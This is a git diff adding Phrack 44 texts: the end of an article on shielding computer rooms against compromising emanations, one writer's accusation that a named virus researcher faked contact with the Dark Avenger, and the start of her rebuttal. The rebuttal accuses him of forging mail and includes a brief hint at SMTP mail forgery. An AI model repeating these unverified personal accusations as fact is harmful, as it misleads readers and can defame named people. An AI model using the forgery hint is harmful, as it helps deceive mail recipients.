+Trying to maintain ergonometric conditions - good viewing conditions for
+the users - renders the shielding of screens especially difficult.  If
+the casing of the instruments is not made of metal but of plastic, the
+following shielding materials are considered: metal foils, metal cloth,
+metal-coated plastics, electrolytical layers and coats of metallic paint
+or paste.  Recently, the plastics industry is also offering metallized
+plies of fabric.  Such glasses are for instance offered by VEGLA,
+Aachen.  Ventilation openings are sealed off with metallic fabric of
+honey-comb wirings.
+
+Interlocking systems and filters on all leads coming out of the
+instrument prevent the emission of compromising shell waves and power
+supply voltages.
+
+3.3.2.2.  Building and Room Shielding
+
+There are some advantages in shielding buildings and rooms.  The
+building and room shielding lies solely in the competence of the user.
+Minor restrictions dealing with the static of the building and local
+building regulations only occur with external shielding.  Building and
+room shielding offers a protection that is independent of the instrument
+or its type.  It is a lasting and effective protection.  Maintenance is
+minimal, and subsequent costs hardly exist.  Interior design and room
+lay-out are not changed.
+
+If one requires better shielding values or a building and room design
+which emphasizes better comfort than greater expenses and thus higher
+costs will occur.
+
+3.3.2.3.  Cabin Shielding
+
+Cabin shielding has all the advantages of building and room shielding.
+In addition, cabin shielding is not affected by the static of the
+building or local building regulations.  Furthermore, cabin shielding
+requires less expenses and costs than building or room shielding.
+
+However, shielded cabins do not offer the same comfort or interior
+design as shielded buildings or rooms.
+
+3.3.3.  Shielding Components
+
+Electromagnetic shielding consists of three components:
+#   the actual shield together with various structural elements as a
+    protection against emitted radiation;
+#   the interlocking of all non-electric and electric supply lines to
+    protect against shell waves;
+#   electric filters at all supply lines to protect against compromising
+    power supply voltages.
+
+3.3.3.1.  The Electromagnetic Shield
+
+The shield consists of the hull and the shielding structural elements.
+
+3.3.3.1.1.  Shield Hull - Method and Construction
+
+In general, one uses metal sheets or metal foil to construct
+electromagnetic shields for buildings and rooms.  If one lowers the
+requirements  on the shield damping and the upper limit frequency then
+screen wire, metallic nets, and - if properly constructed - even the
+reinforced wire net in concrete can be used; the obvious disadvantage
+is that the settlements or movements of the building can cause cracks
+that will render the shield ineffective.
+
+Therefore, only metal shields or strong wire netting is used for the
+construction of electromagnetically shielded cabins.
+
+The building or room shield can be built using several construction
+principles.  Figure 3.2 above shows the essential construction principles.
+
+For the Sandwich construction, the shield is between the outer and inner
+layer of the wall.  A new type of construction uses the Principle of
+the Lost Form.  The shield itself which consists of 3 to 5 mm thick
+sheet iron is used as an inner layer in the manufacturing of concrete
+walls.  The sheets touch one another and have to be welded together at
+the contact points.  If the building or room shields he\ave to satisfy a
+special purpose then they have to be grounded at only one point; they
+have to be assembled in such a way that they electrically insulate
+against the building or room walls.  The so-called inner shields offer
+this protection.  In simple cases, the inners shield is placed on top of
+the walls maintaining insulation by using a special underneath
+construction.  However, this space-saving and simple construction has a
+disadvantage; the part of the shield that faces the wall such as
+corrosion, settling or moving of the building, or damages due to work on
+the exterior of the building can no longer be detected.  The use of
+non-corrosive shield material or sufficient back ventilation of the
+shield protects against corrosion in these cases.  The self-supporting
+inner shield is suspended from a supporting grid construction.  This
+construction can be similar to a cabin construction.  In the case
+of large rooms, such as halls, one should use a truss for statistical
+reasons.  The self-supporting inner shield has the advantage of
+accessibility, although the usable room volume has been decreased.
+
+In rooms where the shield is exposed to only slight mechanical wear and
+tear and not required to shield completely, shielding metal foil is
+glued directly to the wall and welded at the contact points.
+
+The floor construction is almost the same for all four construction
+principles.  It is important that the floor onto which the shield is
+placed is protected from humidity and is even.  In the case of
+electrically insulating layers of, for instance, laminated paper or PVC
+are first put on the floor.  The ceiling construction depends on the
+specific requirements and necessities.  The ceiling shield can be a
+suspended metallic ceiling or a self-supporting ceiling construction.
+
+3.3.3.1.2. Shield Construction Elements
+
+Construction elements which seal off viewing openings or access openings
+are called shield construction elements.  Access openings are doors, gates,
+and hatches.  Viewing openings are windows.
+
+The shielded doors, gates, and hatches serve two purposes: first to
+close off the room, and second to shield the room.
+
+The door, gate, or hatch shield is in general made of sheet iron.
+Passing from the door or gate shield to the room shield causes
+shield-technical problems.  A construction which is due to the company
+of TRUBE & KINGS has proven to be especially effective for this kind of
+problem (see figure 3.3).
+
+The set-on-edge door shield, the so-called knife, is moved into a
+U-shape which contains spring contacts.  The difference between this and
+other available constructions is that the knife is not moved into the
+spring upward.  This construction reduces the wear and tear of the
+transition point between door and room shield and thus increases the
+durability of the construction which implies a better protection and
+higher reliability.  This construction by TRUBE & KINGS satisfies the
+highest requirements on shield damping.
+
+Windows in shielded room are sealed off with the shielding glass or
+so-called honey-comb chimneys.  It si understood that these windows are
+not to be opened.  Figure 3.4 shows the cross-section of a glass
+especially developed by VEGLA for data processing rooms.  The glass
+consists of multiple layers which are worked into a very fine metallic
+net and an evaporated metallic layer.  The thickness of the wire is in
+the range of a few micrometers so that the net is hardly visible.  This
+glass can also be manufactured so that it is rupture- and fire-resistant
+and bullet-proofed.
+
+Using glass one can reach shield dampings in the medium range (refer to
+figure 3.1).  Specially manufactured glass reaches even higher shield
+dampings.
+
+Figure 3.4 also shows the so-called honey-comb chimneys as manufactured
+by SIEMENS.  Visibility and the comfort of light are highly restricted.
+But the advantage is that this type of shielding satisfies the
+requirements for highest shield damping.
+
+3.3.3.2.  Interlocking
+
+All non-electric supply lines leaving a shielded room must be
+interlocked in order to protect against the propagation of shell and
+surface waves.  Water pipes, heating pipes, pneumatic and hydraulic
+pipes are connected via rings to the metallic shield.  Depending on the
+required frequency range, the pipe diameter is also subdivided by filter
+pieces.  At high frequencies on can achieve dampings of up to 100dB
+using such interlocking devices.
+
+The ventilation of shielded rooms may cause problems.  Problems will
+occur if shield dampings up to the highest frequencies are required.  In
+this case one has to use two-step ventilation filters.  The first step
+consist of adding concave conductor filters which work for the
+frequencies up to 200 GHz, the second step of adding absorber filters
+which protect against compromising emitted frequencies above 200 GHz.
+
+Figure 3.5 shows the set-up for the above-described ventilation lock
+which is due to the SCHORCH.
+
+3.3.3.3.  Electric Filters
+
+Filters must be put on electric power supply lines, telephone wires, and
+data processing supply lines at the room exit point.  The filters have
+to be installed at the shield.
+
+The filters used here are the same as the ones shown in the area of
+electromagnetic compatibility.
+
+4.  Summary
+
+Electric devices used in data processing, data transmission and data
+handling emit electromagnetic radiation, electromagnetic shell and
+surface waves, and currents and voltages in power supply lines,
+telephone wires, and data supply lines.
+
+If this emitted radiation carries actual data or information from the
+data processing device then it is compromising.
+
+Using a television receiver, it is very easy to receive, decode and make
+these compromising emissions legibly.  Several possibilities present
+themselves as protective measures against compromising emissions from
+data processing and data transmitting equipment.  The use of shielding
+in the form of room shields, interlocking of supply lines, and filters
+for electric lines is the best protection for the user of data
+processing, data transmitting, and data handling equipment.
\ No newline at end of file
diff --git a/phrack44/11.txt b/phrack44/11.txt
new file mode 100644
index 0000000..6b80f54
--- /dev/null
+++ b/phrack44/11.txt
@@ -0,0 +1,269 @@
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Four, File 11 of 27
+
+****************************************************************************
+
+[Editor's Note:
+
+  The following two files are very interesting.  I never paid ANY
+  attention to the realm of our community that focus on virii.  For
+  some reason, the whole idea behind them is a novel concept, but
+  I never saw any reason to take notice of them.  Even when I've
+  given lectures, I always leave discussion about virii out, since
+  they should be a moot point.  I mean, when "fdisk /mbr" will take
+  care of so many problems, what's the big deal?
+
+  I know I'm over-simplifying things, but jesus...
+
+  Well, while I continued to overlook this small but earnest group
+  of folks who dabble in virii, all kinds of things began to happen.
+  Groups formed, rivalries flared, paranoia ran rampant and one of the
+  most ridiculous cottage industries in the history of personal
+  computing appeared (living on the spread of Fear, Uncertainty and
+  Doubt.)
+
+  Well, in all of this several names have popped up as potential threats
+  to this little world.  One in particular, Sarah Gordon, even got the
+  spotlight as a paranoid, BBS-busting, hacker-bashing psychopath in a
+  rather ill-researched and hastily prepared Phrack piece a few years
+  back.  It is rather odd that in all the hype we in the underground
+  drum up, no one ever bothers to get the other side of the story, so we
+  feed the fervor and continue the paranoia.
+
+  Well, with this in mind, I received a file claiming to have info
+  regarding the big "expose" of Sarah masquerading as the Dark Avenger.
+  Now, even a moron like me has heard of the Dark Avenger, so I read it.
+  After doing so, I wanted to pipe it to /dev/null, but then decided it
+  would be much more fun to send it to Sarah too, and let her respond to it.
+
+  It's amusing as hell, and just goes to show that the underground
+  has as many similarities in its distinct groups as it does
+  differences.]
+
+-----------------------------------------------------------------------------
+
+
+         Sara(h?) Gordon AND THE DARK AVENGER SCAM.
+         By Kohntark
+
+
+         In one of my many online conversations with Sara Gordon
+         I once asked her about the validity of the VNI interviews and
+         her real relationship with the alleged dark avenger; after
+         logging into her VFR BBS and seeing a #2 (hers being #1)
+         account named after him.
+         I proceeded to leave a message for the dark avenger there,
+         claiming that the whole account was bogus as it is highly
+         improbable that this person might call all the way from
+         Bulgaria and log into a mediocre BBS just to chat with her,
+         considering the expense of such long distance call , the
+         economic situation in Eastern Europe and a fact that
+         would learn later: Sara(h) Gordon has an account on the
+         Bulgarian DIGSYS unix server, locally accessible by phone
+         from there!
+
+         As it was expected, Sara(h) quickly 'noticed' my personal
+         message to the dark avenger and replied to my questioning in
+         a public post in FIDONET, (I don't read FIDONET posts and she
+         knows I have no access to them!!!! )
+         She claimed that the dark avenger was fully aware of how much
+         money she made out of the VNI interviews and that she was in
+         touch with him, etc.etc.
+
+         Afterward, I questioned her again about the whole affair
+         and demanded a proof, or some sort of direct contact from the
+         dark avenger to my anonymous internet account.
+
+         Since this was the first time anyone had ever questioned the
+         validity of her relationship with the DA, she took this to
+         heart and shortly after, I received 3 short messages
+         originating from <dav@danbo.digsys.bg> an Internet connected
+         UNIX system in Bulgaria.
+
+         Here they are:
+
+         (Private, compromising parts are X'd out)
+         1st Message:
+
+--------------------------------------------------------------------------------
+-
+From daemon@digsys.bg Wed Jul 14 19:07 EDT 1993
+Received: from danbo.digsys.bg by XXXXXXXXXXXXXXXXXXXXXX; Wed, 14 Jul 93 19:07:3
+4 -0400
+Return-Path: <dav@danbo.digsys.bg>
+Received: by XXXXXXXXXXXXXX (5.67/1.35)
+        id AA12850; Thu, 15 Jul 93 02:04:46 +0300
+Message-Id: <9307142304.AA12850@XXXXXXXXXXXX>
+To: XXXXXXX
+From: dav@danbo.digsys.bg
+Date: Wed, 14 Jul 93 23:41:36 +0300
+Subject: No subject
+Status: RO
+
+
+kohntark-
+
+i just talked to a friend of mine who said you dont like her user
+log. why shouldnt i call her from bulgaria? i call whoever i want
+to, and this is not your problem.
+
+by the way, she sent me your mail. for your information, i do
+know how much money she made of that interview. and i also think
+that this is none of your business.
+
+also, maybe it would be good for you to know, that by offending
+her, you are offending me, too. keep this in mind.
+
+<dav>
+Second Message:
+-------------------------------------------------------------------------
+
+
+>My mail with her is none of your business either.
+
+i dont think so, dude.
+
+
+maybe you need to read the next few lines again,
+in case you missed them.
+
+
+>>
+>> also, maybe it would be good for you to know, that by offending
+>> her, you are offending me, too. keep this in mind.
+>>
+>> <dav>
+ >
+ >HA HA! and you expect me to believe that you are the DA!
+ >send me a proof: an email address from bulgaria or tell me
+ >how many addressing modes does the MTE have?
+ >
+ >nice try.
+
+
+ well, what do you think the domain .bg in my email address stands for?
+ maybe you think its kameroon?
+ as for the mte, im not giving you any info.
+
+ i need not prove anything to anybody, and certainly dont plan to waste more
+ of my time talking to you. you have been warned.
+
+
+<dav>
+
+Third Message:
+-------------------------------------------------------------------------
+
+ oh, yeah. sure it did.
+ only you will not know where something else came from, when it knocks on your
+ door. i have nothing more to say.
+
+-------------------------------------------------------------------------
+
+
+         In my ignorance, I blindly trusted the three cryptic replies
+         to be true, even thought whoever replied refused to give out
+         trivial information such as the number of addressing modes
+         for a 2 year old encryption engine (MTE) and spelled Cameroon
+         with a 'k' (Check out Sara Gordon's spelling of URUGUAY in
+         VIRUS-L Volume 6 Issue 120 -v06i120)
+         Shortly after other unrelated discussions and a CUD post from
+         Sara(h) in which I was mentioned (unnamed), someone warned me
+         of several posts in NUKENET by an alleged dark avenger and
+         Todor Todorov from an account belonging to the last,
+         mentioning me and Aristotle.
+         In those messages I was referred to as 'hotshot,' a word that
+         Sara Gordon had used on me several times on our personal
+         email exchange; It was then that I became highly suspicious
+         of the whole matter.
+
+         I called Virginia's Virus Research Institute's sysop and
+         owner, Aristotle to find out more about the posts and he
+         bought to my attention the particular writing style of
+         Sara(h) Gordon: She NEVER uses capital letters and
+         apostrophes on her personal email, and always signs her name
+         on the lower left hand corner. (She seldom signs her posts
+         nowadays and changes her user name in her vfr@netcom.com
+         account every week!; for further proof of her writing style,
+         please refer to public posts in VIRUS-L Volume 6 #120; I also
+         have over 100K of personal email exchange to prove this
+         fact!)
+
+         It was then that we realized that she was passing herself as
+         Todor Todorov and the dark avenger (who could possibly verify
+         their online identity?) and had infiltrated NUKENET..
+
+         The writing style described corresponds exactly to the one on
+         the posts I received from the 'dark avenger.'
+         Shortly afterward the <dav@danbo.digsys.bg> account was
+         cancelled and I learned the whole truth:
+
+         The danbo.digsys.bg Bulgarian site belongs to Daniel Kalchev,
+         another self appointed AV researcher whose best claims to
+         fame are submitting various Bulgarian viruses to Patricia
+         Hoffman's VSUM!!
+         (You can check this by doing a search on 'Kalchev' on the
+         current VSUMs or you can contact him thru:
+         <daniel@danbo.sigsys.bg> )
+         He is a very close friend of Sara(h) Gordon and he has an
+         account in her VFR BBS (you can check this by logging into
+         her system and checking the user list) and SHE has an
+         account in digsys.bg under <sarah@danbo.digsys.bg> (this
+         account is still valid as far as I know; notice the H after
+         her name!)
+
+         What I concluded is that is the DA would never get an account
+         in such system as he HATES Daniel Kalchev!!!!
+
+         This is what really happened: Sara(h) Gordon in her
+         desperation to prove that she was in touch with the dark
+         avenger, told her pal Daniel Kalchev to make an account under
+         the dark avenger's name (<dav> this is how she always refers
+         to him, even though he never signs his name that way (check
+         the source code for his 'Dark Avenger' virus or the
+         'Commander Bomber' virus message name: [DAME])
+         From there she could email me messages that would come from
+         Bulgaria and would be untraceable since she would log into
+         her account in digsys.bg and log into the <dav> account
+         internally from the same site in Bulgaria. (You can check
+         where and when most of the people log from in most internet
+         unix and vax sites)
+
+         As it is expected from her, she has denied any of this.
+         Some of her ridiculous explanations include things like
+         "hotshot is a very common English word in Bulgaria" !!!
+
+         You might ask yourself what is the deal with the h? is it
+         sara or sarah??
+         Well, I asked her the same question when I noticed this in
+         one of the VNI interviews, where her name is spelled as
+         Sarah.
+         She replied that this was a mistake of the publisher.
+         Mistake? well not really, it was another lie, meant to throw
+         off any information and truth seekers, for example you can
+         check her account in Daniel Kalchev's system:
+         <saraH@danbo.digsys.bg> , spelled with an H,
+         another 'mistake of the publisher?'
+         :)
+
+         Other countless Sara Gordon lies are told in NUKE Info-
+         Journal # 6.
+
+         This behavior puts in question the validity of the VNI
+         interviews and the reputation of Sara(h) Gordon as a serious
+         (self appointed) 'virus researcher'
+
+         IMHO the VNI interviews are a complete fabrication, meant
+         only to boost her validity as a 'journalist', and to make her
+         lots of money, charging for further 'interviews' to other
+         magazines. (She has offered her paid 'interviewing' services
+         to various other publications.)
+
+         To the best of my knowledge the information I present here
+         is true and can be checked.
+         I chose to publish this information, despite threats against
+         my well being and countless lies about me propagated by
+         Sara(h) Gordon.
+         I am doing this to stop the lies and corruption fostered by
+         the Anti-Virus industry.
diff --git a/phrack44/12.txt b/phrack44/12.txt
new file mode 100644
index 0000000..f91ea01
--- /dev/null
+++ b/phrack44/12.txt
@@ -0,0 +1,1042 @@
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Four, File 12 of 27
+
+****************************************************************************
+
+                            Sarah Gordon's Response
+
+
+Greetz and Salutations :)
+
+Thank you for giving me the opportunity to contribute to Phrack. While
+we may not agree on everything, I appreciate the chance to speak for
+myself. In the past, as many people now know, I have not
+had the opportunity to do so. My philosophies and ideals are quite similar
+to your own, and I hope that my response to this "Article" will help shine
+a bit of light on what is really going on here.
+
+I don't really want to spend too much time on it, because it is, as you
+said, obviously a personal attack. But, on the other hand, such nonsense
+can grow to the point where it has an effect. Perhaps a backlash on the
+programmers and hackers in Bulgaria, which of course will spread to the
+United States. They have suffered a lot of persecution because of the past
+malicious and irresponsible acts of some of their virus writers. Since Dark
+Avenger stopped writing viruses, their reputation has improved somewhat.
+
+David Briscoe recently wrote:
+
+"Computer hackers in former communist countries, including an elusive Bulgarian
+known as the Dark Avenger, are creating mischievous and sometimes costly viruses
+that threaten computers around the world".
+
+Following a recent interview I conducted with Dark Avenger, I was chastised for
+not making his identity known so he could be 'made to pay'.
+
+In "Discover" Magazine, writers Paul Mungo and Brian Clough
+are quoted from their book 'Approaching Zero' "the Mutating Engine...the
+most dangerous virus ever produced".  This is so stupid, especially
+considering the thing does not replicate. It's a tool that can be used
+to perform encryption. Well, decryption too, but explanation of how it
+works aren't the point here, suffice to say it's not "the most dangerous
+virus ever produced".
+
+If people are going to rely on the media as an information resource, the
+media owes it to us to provide us with accurate information. However,
+this is simply not always the case.
+
+If you consider the actual viruses commonly found -in the wild- (that is,
+by computer users such as those from universities, corporations, etc.),
+the number of Bulgarian viruses -directly- impacting the users is a very
+insignificant number. For some reason, the media likes to play up
+Bulgaria as the big force behind the destruction of data!
+
+I personally don't have an interest in the economy of Bulgaria or any
+other country, but the media sure likes to use this kind of
+"information" to sell their own particular brand of fear.
+
+No more fear. Fear is a bad thing. It is one of the things that leads us
+to have government intervention into areas of our lives where it is
+definitely not desired.
+
+
+
+         Sara(h?) Gordon AND THE DARK AVENGER SCAM.
+         By K$hntark
+
+
+
+         In one of my many online conversations with Sara Gordon
+         I once asked her about the validity of the VNI interviews and
+         her real relationship with the alleged dark avenger; after
+         logging into her VFR BBS and seeing a #2 (hers being #1)
+         account named after him.
+
+
+Of course his (Dark Avenger) name was #2 there. I put it there for him. His last
+call to my BBS was July 31, 1993 at 1:55 p.m. However, this was not the start of this
+business with Kohntark. He had been mailing me for about one month. From
+an account using the address of cxxxxx.ic.xxxxxx.edu. Keep this address
+in mind. It will come in handy later.
+
+I am not exactly sure of the date of the first message, but I think about one
+month. He had been reasonable enough at first, but he became
+increasingly agitated. Since he felt it was appropriate to include
+personal mail from Dark Avenger to him here, I think I can go ahead and
+illustrate for you some of his "hacking" :) (well, if you can call it
+hacking. you decide). (OH GOD, LOWER CASE...LeTZ SeE...)
+
+
+         I proceeded to leave a message for the dark avenger there,
+         claiming that the whole account was bogus as it is highly
+         improbable that this person might call all the way from
+         Bulgaria and log into a mediocre BBS just to chat with her,
+         considering the expense of such long distance call , the
+         economic situation in Eastern Europe and a fact that
+         would learn later: Sara(h) Gordon has an account on the
+         Bulgarian DIGSYS unix server, locally accessible by phone
+         from there!
+
+This guy doesn't seem to know much about the "economic situation in
+Eastern Europe". At least, about Dark Avenger's personal economic
+state:) or mine. Maybe Dark Avenger could call digsys, but I
+certainly couldn't when I first started talking to him. I didn't have
+any internet account. All I had was my mediocre BBS.   He couldn't get to
+my BBS any way but to call me, directly.
+
+
+Yes, I have an account there -now-, but I don't and didn't use it to chat with
+Dark Avenger. He did not want the sysadmin to monitor our chats. And, I
+didn't -have- that account until after I had talked to Dark Avenger for
+a long time, so I could hardly have used that server to talk to him
+early on I didn't have an account there then :) In fact, neither did he,
+at that time, because there was no digsys.bg as far as I know. He called
+Danbo BBS for years. It was not on the internet. He did later use it later,
+once it actually got onto the internet, to occasionally mail me, but not much.
+He used it more to come to IRC.
+
+In fact, a couple people you know talked to him there, with me. They didn't
+like him much; found him rude and arrogant. He can be.
+
+However, he most certainly did call me here. Does Kohntark think he is
+the only one who can make long distance telephone calls? Dark Avenger
+called me frequently, and not always from Bulgaria. I don't know how or
+if he paid for the calls, all I know is that since I couldn't afford
+to call, and didn't know any number for him, he called me.
+
+As for my "mediocre" BBS, it serves its purpose:) I think giving out
+virus free anti-virus products, and products that don't cost the users a
+small fortune, and that actually WORK is quite a good purpose. I don't
+see any reason for people to be exploited by some a-v companies, who
+are promoted by various magazines, which in turn rate them highly
+because they are doing their advertising.
+
+         As it was expected, Sara(h) quickly 'noticed' my personal
+         message to the dark avenger and replied to my questioning in
+         a public post in FIDONET, (I don't read FIDONET posts and she
+         knows I have no access to them!!!! )
+
+Kohntark called my BBS, at my invitation, on July 13, 1993 at 23:19.
+There's no other way he could have left any mail because its an invite
+only system. It's not like it was any big shock to me that he called.
+He asked me to make him an account and I did.
+
+Dark Avenger was a regular caller to my BBS, and read his message, I
+imagine, since he fwded it to me. I don't know what access Kohntark
+has or doesn't have, as far as what networks he uses, (as far as what
+networks he reads mail from, that is) as I explained to
+him. I mailed him there because of the mail he left to Dark Avenger (which
+he forwarded to me) on MY system, and because I received a very nasty message
+from Kohntark, using the address kohntark@rot.in.hell.com, if I remember
+correctly. I sent the message, and did include answers to his questions
+because I wanted to continue talking with him. The message had the headers
+included from, guess where? cxxxxx.ic.xxxxxx.edu....
+
+
+         She claimed that the dark avenger was fully aware of how much
+         money she made out of the VNI interviews and that she was in
+         touch with him, etc.etc.
+
+This is the truth. In case anyone is curious, the amount of money I made
+from this article was less than the amount of my PC Pursuit Bill from
+calling to do chats and talks with him. At that time he had accesses via
+various networks, and we talked on a regular basis. Additionally, Dark
+Avenger had full control over taking out or editing any of his comments
+in the interview. It is a policy of mine. If you wish to confirm it, I
+can put you in touch with other virus writers. I can in fact do it any
+time probably, as they are usually around where we are. Let me know if
+you want me to do it. Dark Avenger was even a bit obsessive about how
+much money I would make.
+
+I also "sold" the story to PCWorld, where it has been published, in
+part. I have not received any compensation for this yet. More later on why I
+did the interview.
+
+Maybe the problem is I didn't interview Kohntark...
+
+         Afterward, I questioned her again about the whole affair
+         and demanded a proof, or some sort of direct contact from the
+         dark avenger to my anonymous internet account.
+
+First, I do not have to "prove" my contact with this man to anyone. It
+has been well enough observed and documented every step of the way. Ever
+hear of the dedicated virus? It is the demo virus that came with the
+Mutation Engine. It contains "We dedicate this little virus to sara
+gordon who wanted to have a virus named after her". (At this point, Dark
+Avenger did not really know me, we were just establishing our contact;
+he still used the spelling Sara for my name :)
+
+I provided Kohntark with an address with Dark Avengers permission.
+Actually, the account Dark Avenger had at digsys which he used to get to
+me on chats or IRC (2 years after initial contact) was not
+under the name Dark Avenger OR dav, but under another name which would
+draw less attention to itself if someone happened to finger us during
+one of our chats. The system adminstrator made the additional account
+later, since he knew quite well it -was- Dark Avenger, having had an
+ongoing battle with him for years.
+
+Kohntark wrote to Dark Avenger there, just like he said he did. At least
+this much is true. And, I did receive copies of the mail. Actually Dark
+Avenger did not want to even answer the mail, but I asked him to please
+do it so that the guy would leave me alone.
+
+Someone using the same mail headers had already sent a message to WIRED,
+telling them "The DA is old news, he hasn't made a virus in 2 years,
+you should interview ME". Wonder who that might have been......
+Does the header cxxxxx.ic.xxxxxx.edu ring any bells?
+
+At that point, Kohntark forged mail to WIRED magazine, this time posing
+as Dark Avenger. I would never have known this, but Dark Avenger fwd back
+a very strange reply message from WIRED and asked me what in the hell was
+going on. In that message, WIRED had included part of the message they
+had received. It clearly displayed the cxxxxx.ic.xxxxxx.edu headers,
+indicating that the mail had been sent from someone there! Someone who
+told WIRED "I don't want to talk to you" (paraphrased). Even WIRED told
+me "That mail did not sound like Dark Avenger..it was just all wrong"
+(paraphrased). I pointed out the headers to them later. It was a bad
+hack on Kohntark's part. Anyone doubts, it mail the sysadmin at
+digsys.bg.
+
+Here is a copy of that mail,  with "compromising" parts xxxxed out.
+
+First, Dark Avenger's legitimate fwd to me:
+
+
+From dav@digsys.bg Sat Jul 24 20:36:12 1993
+Return-Path: <dav@digsys.bg>
+Received: from mcsun.EU.net by mail.netcom.com (5.65/SMI-4.1/Netcom)
+        id AA04202; Sat, 24 Jul 93 20:34:29 -0700
+Received: from danbo.UUCP by mcsun.EU.net with UUCP
+        id AA18612 (5.65b/CWI-2.220); Sun, 25 Jul 1993 05:35:36 +0200
+Received: by danbo.digsys.bg (5.67/1.37) via EUnet
+        id AA06614; Sun, 25 Jul 93 05:33:30 +0300
+From: dav@digsys.bg (Dark Avenger)
+Message-Id: <9307250233.AA06614@danbo.digsys.bg>
+Subject: Re: FWD>None (fwd)
+To: vfr@netcom.com
+Date: Sun, 25 Jul 93 5:33:29 EET DST
+X-Mailer: ELM [version 2.3 PL11]
+Status: OR
+
+Then, the message from xxxxxxxxxxx at WIRED:
+
+Forwarded message:
+>From xxxxxx!wired.com!xxxxx Sat Jul 24 01:34:30 1993
+Message-Id: <9307232129.AA02102@wired.com>
+Date: 23 Jul 1993 14:27:42 -0800
+From: "xxxxxxxxxxx" <xxxxx@wired.com>
+Subject: Re: FWD>None
+To: dav@digsys.bg
+
+        Reply to:   RE>FWD>None
+
+*Some mail from WIRED guy replying to the message***
+
+
+And now, the mail that prompted xxxxxxx's reply. I guess Kohntark didn't
+realize that the mail would receive a reply. Or, didn't realize the
+reply would include the mail headers:
+
+--------------------------------------
+Date: 7/23/93 12:35 AM
+To: xxxxxxxxxxx
+From: xxxx
+Received: by xx.wired.com with SMTP;22 Jul 1993 05:38:19 -0800
+Received: from anon.penet.fi by wired.com via SMTP (920330.SGI/911001.SGI)
+        for xxxxx@xx.wired.com id AA00423; Thu, 22 Jul 93 05:35:20 -0700
+Received: from cxxxxx.ic.xxxxxx.edu by anon.penet.fi (5.67/1.35)
+              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+        id AA21218; Thu, 22 Jul 93 15:24:44 +0300
+Date: Thu, 22 Jul 93 15:24:44 +0300
+From: dav@digsys.bg
+Message-Id: <9307221224.AA21218@anon.penet.fi>
+
+Return-Path:<dav@digsys.bg>
+Date: Fri 13, 66 00:00:00 EST
+To:<xxxxxxx@wired.com>
+Subject:Not interest.
+Status:RO
+
+I read in VIRUS-L that some idiot  (atman@rahut.net) wants to do
+interview with me face to face.
+I am not interested in being in your magazine.
+I am not interested in being interviewed, even if you offer me $1000.
+or more.
+I am not interested. so tell your friend to stop mentioning me in
+VIRUS-L, i have NO interest.
+Please don't bother to reply. I have no time for stupidity.
+
+<dav>
+
+---------
+Interesting use of the anonymous mailer port 25, eh?  (clue: try helo)
+
+         Since this was the first time anyone had ever questioned the
+         validity of her relationship with the DA, she took this to
+         heart and shortly after, I received 3 short messages
+         originating from <dav@danbo.digsys.bg> an Internet connected
+         UNIX system in Bulgaria.
+
+HAHAHA. This has been questioned many times. Do you think the ACM, or
+any magazine would risk printing this without adequate proof? My contacts early
+on with the virus writer were well documented. I had to prove myself to
+everyone from Vesselin Bontchev (who did not believe me until he had
+seen the source code to Commander Bomber, which is a virus; the source
+code has never been made available to anyone). Here:
+
+
+From bontchev@informatik.uni-hamburg.de Tue Oct 12 02:34:53 1993
+Return-Path: <bontchev@informatik.uni-hamburg.de>
+Received: from deneb.dfn.de by mail.netcom.com (5.65/SMI-4.1/Netcom)
+        id AA09608; Tue, 12 Oct 93 02:34:34 -0700
+Received: from fbihh.informatik.uni-hamburg.de by deneb.dfn.de (4.1/SMI-4.2)
+        id AA05014; Tue, 12 Oct 93 10:33:30 +0100
+From: bontchev@informatik.uni-hamburg.de (Vesselin Bontchev)
+Message-Id: <9310120933.AA22605@fbihh.informatik.uni-hamburg.de>
+Received: by fbihh.informatik.uni-hamburg.de (5.65+/FBIHH-1.21);
+        id AA22605; Tue, 12 Oct 93 10:33:45 +0100
+Subject: Re: urgent
+To: vfr@netcom.com
+Date: Tue, 12 Oct 1993 10:33:42 +0100 (MET)
+In-Reply-To: <9310120331.AA01134@netcom4.netcom.com> from "sara" at
+Oct 11, 93 08:31:48 pm
+X-Mailer: ELM [version 2.4 PL23]
+Content-Type: text
+Content-Length: 2211
+Status: OR
+
+....blah blah..(deleted)
+
+So, here is my official statement.
+
+I hereby confirm that when I met Sarah S. Gordon in March 1993 in New
+York, she showed me the original source of the Commander Bomber virus.
+It was obviously a source and not a disassembly, and it was very
+similar to a couple of other sources of Dark Avenger's programs that I
+have seen. When I say "similar" I mean such things like label names,
+commenting style, layout of the text and so on. Of course, this is not
+a proof that it has been really produced by the Dark Avenger, but this
+is very probable. Sarah didn't give me a copy of it and I didn't
+insist, because she told me that she has promised to Dark Avenger not
+to give this source to anybody. To my knowledge, nobody else has the
+source.
+
+Regards,
+Vesselin
+- --
+Vesselin Vladimirov Bontchev          Virus Test Center, University of Hamburg
+Tel.:+49-40-54715-224, Fax: +49-40-54715-226      Fachbereich Informatik - AGN
+< PGP 2.3 public key available on request. > Vogt-Koelln-Strasse 30, rm. 107 C
+e-mail: bontchev@fbihh.informatik.uni-hamburg.de        22527 Hamburg, Germany
+
+Keep in mind, Vesselin is not a product developer and has no affiliation
+with any developers. He is a Doctoral Student who has himself been
+accused of being the Dark Avenger.
+
+The Bulgarian Secret Police seemed to believe my
+contact was legitimate enough. I received an "invitation" to meet with
+them. I declined this "invitation" because I am not interested in the terrorist
+tactics of a desperate government to blame a hacker and virus writer for
+the problems of the country in general.
+
+I had to prove my contact lots of ways, just to get the article in
+print. Why did I want this article in print? One simple reason. To show
+this virus writer as not some evil sinister monster from Hell waiting to
+destroy the earth's supercomputer. Just as a person like the rest of us.
+Did it accomplish it? I think it did, from the response I got from most
+people. Did -I- personally 'benefit' from it? In some ways, I did.
+
+This reminds me, a certain ex-virus exchange sysop told me that he was
+going to make me expose the Dark Avenger; that he was going to find out
+his true identity, where no one else could; that he would make up some
+story, any story, to force Dark Avenger out into the open. Well, I don't
+narc on my friends. I am sure you can appreciate that.
+
+         Here they are:
+
+         (Private, compromising parts are X'd out)
+         1st Message:
+
+--------------------------------------------------------------------------------
+-
+>From daemon@digsys.bg Wed Jul 14 19:07 EDT 1993
+Received: from danbo.digsys.bg by XXXXXXXXXXXXXXXXXXXXXX; Wed, 14 Jul 93 19:07:3
+4 -0400
+Return-Path: <dav@danbo.digsys.bg>
+Received: by XXXXXXXXXXXXXX (5.67/1.35)
